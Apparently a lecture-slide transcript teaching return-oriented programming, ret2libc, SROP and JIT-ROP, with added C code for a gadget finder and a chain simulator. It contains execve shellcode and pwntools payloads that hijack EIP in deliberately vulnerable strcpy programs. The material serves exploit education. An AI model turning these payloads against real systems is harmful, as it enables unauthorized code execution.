ROP and its friends

Post on 15-Jan-2017


ROP and its friends, by Rakesh Paruchuri

CONTENTS

> WHAT IS ROP
> THE NEED FOR ROP
> ROP vs RET2LIBC
> FRIENDS

What is ROP?

→ return oriented programming
→ takes advantage of a buffer overflow
→ to gain control over the instruction pointer
→ and chain gadgets together

NEED FOR ROP

To exploit code we need:

→ code execution
→ overflow a buffer on the stack
→ get control over EIP by overwriting the saved return address

LET’S GIVE A TRY

    #include <stdio.h>
    #include <string.h>   /* strcpy */

    int main(int argc, char **argv) {
        char buffer[50];
        strcpy(buffer, argv[1]);   /* no length check: an argv[1] longer than the buffer
                                      runs over the saved EBP and the saved EIP */
        return 0;
    }

Exploit (pwntools; shellcode and stack address are the slide's values, taken with ASLR off and an executable stack):

    from pwn import *
    import sys

    # classic jmp/call execve("/bin/sh") shellcode: the call pushes the address
    # of the "/bin/sh" string that follows it (31 bytes of code + 7 of string)
    shellcode  = b'\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c'
    shellcode += b'\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80'
    shellcode += b'\xe8\xe3\xff\xff\xff/bin/sh'

    payload  = shellcode          # lands at the start of buffer
    payload += b'A' * 16          # 38 + 16 = 54 bytes: fill up to the saved EIP
    payload += p32(0xffffd676)    # saved EIP -> address of buffer on the stack

    sys.stdout.buffer.write(payload)   # raw bytes, not a str print

Return To Libc

NX: protection mechanism that marks the stack non-executable, so shellcode injected into the buffer no longer runs. We can still corrupt the stack and control EIP, though.

So why not point EIP at code that is already in the process and can create a shell?

Return To Libc

→ assume libc sits at a fixed address (ASLR off)
→ pad the buffer with junk ("blah blah") until the saved EIP is reached
→ overwrite the saved EIP with &system
→ follow it with a fake return address for system (cdecl: the callee sees [return address][first argument])
→ supply &"/bin/sh" as the argument

LET’S GIVE A TRY

    #include <stdlib.h>
    #include <string.h>   /* strcpy */

    int main(int argc, char **argv) {
        char buffer[50];
        strcpy(buffer, argv[1]);
        return 0;
    }

EXPLOIT

    from pwn import *
    import sys

    payload  = b'A' * 54          # padding up to the saved EIP (offset found for this binary)
    payload += p32(0xf7e48190)    # &system: the saved EIP now returns into libc
    payload += b'BBBB'            # fake return address for system (crashes once the shell exits)
    payload += p32(0xf7f68a24)    # &"/bin/sh" in libc: system's first argument

    sys.stdout.buffer.write(payload)

ROP

ASLR: protection mechanism that randomizes the base addresses of shared libraries, the stack and the heap on every run, so the libc addresses hard-coded in the ret2libc exploit no longer hold.

What is ROP?

→ return oriented programming
→ re-use pieces of code from the code segment of the binary itself (a non-PIE executable keeps a fixed load address even under ASLR)
→ assemble those pieces into the behaviour of the desired shellcode

GADGETS

A gadget is any short instruction sequence ending with a RET instruction.

ret = pop eip: RET loads EIP from the word at the top of the stack and advances ESP. Whoever controls the stack therefore decides where each gadget returns to, and that is what lets gadgets be chained.

EXAMPLE FOR GADGET

→ stores several values taken from the stack into registers
→ you don't lose control over EIP, because of the RET at the end of the gadget

corresponding code for the gadget (a 64-bit example, unlike the rest of the deck: the gadget pops into rbx, rbp and r12 and then returns)

    payload += p64(0x401093)      # address of the gadget: pop rbx ; pop rbp ; pop r12 ; ret
    payload += p64(rbx_value)     # popped into rbx
    payload += p64(rbp_value)     # popped into rbp
    payload += p64(r12_value)     # popped into r12
    payload += p64(next_gadget)   # consumed by the final ret: EIP/RIP moves on to the next gadget
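Where do gadget addresses such as 0x401093 come from? Gadget finders scan the code segment for ret instructions and walk backwards from each one. The following is an added example (my code, not from the slides) that does exactly that for the simplest gadget family, "pop r64 ; ret": it decodes only the one-byte pop opcodes, their REX.B form for r8..r15, and a plain ret, so it is a deliberately narrow stand-in for a real disassembler. The byte blob and the base address 0x401090 are constructed so that the three-pop gadget implied by the payload above lands at 0x401093; they are assumptions, not bytes from a real binary.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_POPS 8

struct gadget { uint64_t addr; char text[64]; };

/* Register picked by the low 3 bits of the pop opcode (0x58 + r); a REX.B
 * prefix (0x41) in front selects the upper row (r8..r15). */
static const char *reg_lo[8] = {"rax","rcx","rdx","rbx","rsp","rbp","rsi","rdi"};
static const char *reg_hi[8] = {"r8","r9","r10","r11","r12","r13","r14","r15"};

/* If the instruction ending at code[end-1] is "pop r64", return its length
 * (1, or 2 with REX.B) and set *reg; otherwise return 0. */
static size_t pop_ending_at(const uint8_t *code, size_t end, const char **reg) {
    if (end < 1 || code[end - 1] < 0x58 || code[end - 1] > 0x5f) return 0;
    int r = code[end - 1] & 7;
    if (end >= 2 && code[end - 2] == 0x41) { *reg = reg_hi[r]; return 2; }
    *reg = reg_lo[r];
    return 1;
}

static void emit(struct gadget *out, size_t *n, size_t max_out, uint64_t addr,
                 const char **regs, int npops) {
    if (*n >= max_out) return;
    struct gadget *g = &out[(*n)++];
    g->addr = addr;
    g->text[0] = '\0';
    for (int k = 0; k < npops; k++) {
        strncat(g->text, "pop ", sizeof g->text - strlen(g->text) - 1);
        strncat(g->text, regs[k], sizeof g->text - strlen(g->text) - 1);
        strncat(g->text, " ; ", sizeof g->text - strlen(g->text) - 1);
    }
    strncat(g->text, "ret", sizeof g->text - strlen(g->text) - 1);
}

/* For every ret (0xc3) walk backwards over pop instructions and record each
 * suffix as a gadget of its own: entering a pop;pop;pop;ret sequence at its
 * second or third pop is as valid an entry point as the first. Only pop/ret
 * encodings are decoded here; real gadget finders use a full disassembler. */
size_t find_pop_ret_gadgets(const uint8_t *code, size_t len, uint64_t base,
                            struct gadget *out, size_t max_out) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (code[i] != 0xc3) continue;
        const char *regs[MAX_POPS];
        int npops = 0;
        size_t start = i;
        emit(out, &n, max_out, base + start, regs, 0);            /* bare ret */
        while (npops < MAX_POPS) {
            const char *reg;
            size_t l = pop_ending_at(code, start, &reg);
            if (!l) break;
            start -= l;
            for (int k = npops; k > 0; k--) regs[k] = regs[k - 1]; /* keep execution order */
            regs[0] = reg;
            npops++;
            emit(out, &n, max_out, base + start, regs, npops);
        }
    }
    return n;
}

/* Constructed code bytes (assumption, not a real binary), laid out so that the
 * three-pop gadget from the slide starts at 0x401093. */
static const uint8_t sample_code[] = {
    0x48, 0x89, 0xc7,   /* mov rdi, rax      0x401090 */
    0x5b,               /* pop rbx           0x401093 */
    0x5d,               /* pop rbp           0x401094 */
    0x41, 0x5c,         /* pop r12           0x401095 */
    0xc3,               /* ret               0x401097 */
    0x90, 0x90,         /* nop ; nop         0x401098 */
    0x31, 0xc0,         /* xor eax, eax      0x40109a */
    0x5f,               /* pop rdi           0x40109c */
    0xc3,               /* ret               0x40109d */
    0xc3,               /* ret               0x40109e */
};
static const uint64_t sample_base = 0x401090;

int main(void) {
    struct gadget g[16];
    size_t n = find_pop_ret_gadgets(sample_code, sizeof sample_code, sample_base, g, 16);
    for (size_t i = 0; i < n; i++)
        printf("0x%" PRIx64 " : %s\n", g[i].addr, g[i].text);
    return 0;
}
```

Running it lists seven gadgets: the bare rets, "pop rdi ; ret" at 0x40109c, and the three entry points into the pop rbx / pop rbp / pop r12 sequence, the longest of which is the 0x401093 gadget the payload above uses. Scanning an actual binary means feeding its .text bytes and load address instead of the constructed blob.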

LET'S GIVE A TRY

    #include <stdio.h>
    #include <stdlib.h>   /* system */
    #include <string.h>   /* strcpy */

    static int flag;

    void vuln_function1() { flag++; }

    void vuln_function2() { if (flag == 1) system("/bin/sh"); }

    int main(int argc, char **argv) {
        char buf[50];
        strcpy(buf, argv[1]);   /* the overflow */
        return 0;
    }

EXPLOIT

    from pwn import *
    import sys

    payload  = b'A' * 54
    payload += p32(0x0804844d)   # address of vuln_function1: flag becomes 1; its own ret pops the next word
    payload += p32(0x08048536)   # gadget: pop ebx ; ret
    payload += p32(0xdeedbeef)   # junk, popped into ebx by the gadget
    payload += p32(0x0804845f)   # address of vuln_function2: flag == 1, so system("/bin/sh") runs

    sys.stdout.buffer.write(payload)
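To see why these chains work, here is an added example (my code, not from the slides) that models the one rule the deck keeps coming back to, ret = pop eip, over both payloads: the ret2libc chain from the previous section and the ROP chain just above. The addresses are the slide's; the simulator knows only what the exploit comments say, namely that 0xf7e48190 is system, that 0x0804844d and 0x0804845f are the two functions, and that 0x08048536 is a pop ebx ; ret gadget. It models control flow only: function bodies are not executed, a call is just recorded together with the cdecl first argument sitting above the return address.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_WORDS 16
#define MAX_CALLS   8

/* What the simulated EIP may land on: a function (we record the call and it
 * returns through [esp]) or the slide's "pop ebx ; ret" gadget. */
enum kind { K_FUNC, K_POP_EBX_RET };
struct target { uint32_t addr; enum kind kind; const char *name; };
struct call   { const char *name; uint32_t arg0; };

struct cpu {
    uint32_t eip, esp, ebx;
    uint32_t stack[STACK_WORDS];      /* stack[0] is the overwritten saved EIP */
    struct call calls[MAX_CALLS];
    int ncalls;
};

/* pwntools p32(): little-endian 32-bit pack. */
static void p32(uint8_t *out, uint32_t v) {
    for (int i = 0; i < 4; i++) out[i] = (uint8_t)(v >> (8 * i));
}

/* ret = pop eip: take the word at [esp], move esp up one word. */
static uint32_t pop32(struct cpu *c) {
    uint32_t v = c->esp / 4 < STACK_WORDS ? c->stack[c->esp / 4] : 0;
    c->esp += 4;
    return v;
}
static void do_ret(struct cpu *c) { c->eip = pop32(c); }

/* Decode the payload bytes after the padding into the simulated stack, first
 * word into the saved-EIP slot, exactly as the overflow lays them out. */
static void load_chain(struct cpu *c, const uint8_t *p, size_t len, size_t pad) {
    memset(c, 0, sizeof *c);
    for (size_t i = pad, w = 0; i + 4 <= len && w < STACK_WORDS; i += 4, w++)
        c->stack[w] = (uint32_t)p[i] | (uint32_t)p[i + 1] << 8 |
                      (uint32_t)p[i + 2] << 16 | (uint32_t)p[i + 3] << 24;
}

static const struct target *lookup(const struct target *t, size_t n, uint32_t a) {
    for (size_t i = 0; i < n; i++) if (t[i].addr == a) return &t[i];
    return NULL;
}

/* The vulnerable function's own ret fires first and loads the overwritten saved
 * EIP. A function then records its call (cdecl: arg0 is the word above the
 * return address) and returns into whatever sits at [esp]; the gadget pops one
 * word into ebx and returns. Stops when EIP leaves the table, which is where a
 * real process would crash. Returns the number of calls made. */
static int run(struct cpu *c, const struct target *t, size_t n) {
    do_ret(c);
    for (int steps = 0; steps < 32; steps++) {
        const struct target *hit = lookup(t, n, c->eip);
        if (!hit) break;
        if (hit->kind == K_FUNC) {
            if (c->ncalls < MAX_CALLS) {
                c->calls[c->ncalls].name = hit->name;
                c->calls[c->ncalls].arg0 =
                    c->esp / 4 + 1 < STACK_WORDS ? c->stack[c->esp / 4 + 1] : 0;
                c->ncalls++;
            }
            do_ret(c);
        } else {
            c->ebx = pop32(c);   /* pop ebx */
            do_ret(c);           /* ret */
        }
    }
    return c->ncalls;
}

/* The deck's ret2libc payload: 'A'*54 + &system + 'BBBB' + &"/bin/sh". */
int simulate_ret2libc(struct cpu *c) {
    static const struct target libc[] = { { 0xf7e48190u, K_FUNC, "system" } };
    uint8_t payload[54 + 12];
    memset(payload, 'A', 54);
    p32(payload + 54, 0xf7e48190u);     /* saved EIP -> &system */
    memcpy(payload + 58, "BBBB", 4);    /* fake return address for system */
    p32(payload + 62, 0xf7f68a24u);     /* system's argument: &"/bin/sh" */
    load_chain(c, payload, sizeof payload, 54);
    return run(c, libc, 1);
}

/* The deck's ROP payload: 'A'*54 + vuln_function1 + (pop ebx ; ret) + junk + vuln_function2. */
int simulate_rop(struct cpu *c) {
    static const struct target bin[] = {
        { 0x0804844du, K_FUNC,        "vuln_function1" },
        { 0x08048536u, K_POP_EBX_RET, "pop ebx ; ret"  },
        { 0x0804845fu, K_FUNC,        "vuln_function2" },
    };
    uint8_t payload[54 + 16];
    memset(payload, 'A', 54);
    p32(payload + 54, 0x0804844du);
    p32(payload + 58, 0x08048536u);
    p32(payload + 62, 0xdeedbeefu);     /* swallowed by pop ebx */
    p32(payload + 66, 0x0804845fu);
    load_chain(c, payload, sizeof payload, 54);
    return run(c, bin, 3);
}

int main(void) {
    struct cpu c;
    int n = simulate_ret2libc(&c);
    printf("ret2libc: %d call: %s(0x%08x); then EIP = 0x%08x, the fake 'BBBB' return\n",
           n, c.calls[0].name, (unsigned)c.calls[0].arg0, (unsigned)c.eip);
    n = simulate_rop(&c);
    printf("rop: %d calls: %s then %s; ebx = 0x%08x\n",
           n, c.calls[0].name, c.calls[1].name, (unsigned)c.ebx);
    return 0;
}
```

Two things the trace makes visible: in ret2libc the word after &system is never executed as code, it is simply where system returns to once the shell exits (hence the deck's 'BBBB'), while in the ROP chain the pop ebx ; ret gadget exists purely to swallow 0xdeedbeef so that the next ret lands on vuln_function2. Drop that gadget and the chain would try to "return" into 0xdeedbeef instead.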

ROP vs RET2LIBC

RET2LIBC | ROP   (comparison table; only the column headers survive in the transcript)

SROP

→ needs far fewer gadgets
→ builds the exploit by chaining system calls
→ the attacker sets up a fake signal frame on the stack and returns into the sigreturn system call, so the kernel restores every register (EIP and ESP included) from a signal frame it never delivered

exploiting rop: attacker-controlled registers

eip, esp

exploiting srop: attacker-controlled registers

eip, esp, and through the fake frame every other register sigreturn restores


JIT-ROP

→ fine-grained address space layout randomization shuffles the code inside the binary, not just its base address
→ gadget offsets vary from run to run, so a chain cannot be precomputed
→ requires an information leak: a memory disclosure that lets the exploit read code pages at run time
→ gadget discovery and chaining must therefore be done at run time, "just in time"

→ executing shellcode on the stack
→ ret2libc
→ rop
→ srop & jit-rop
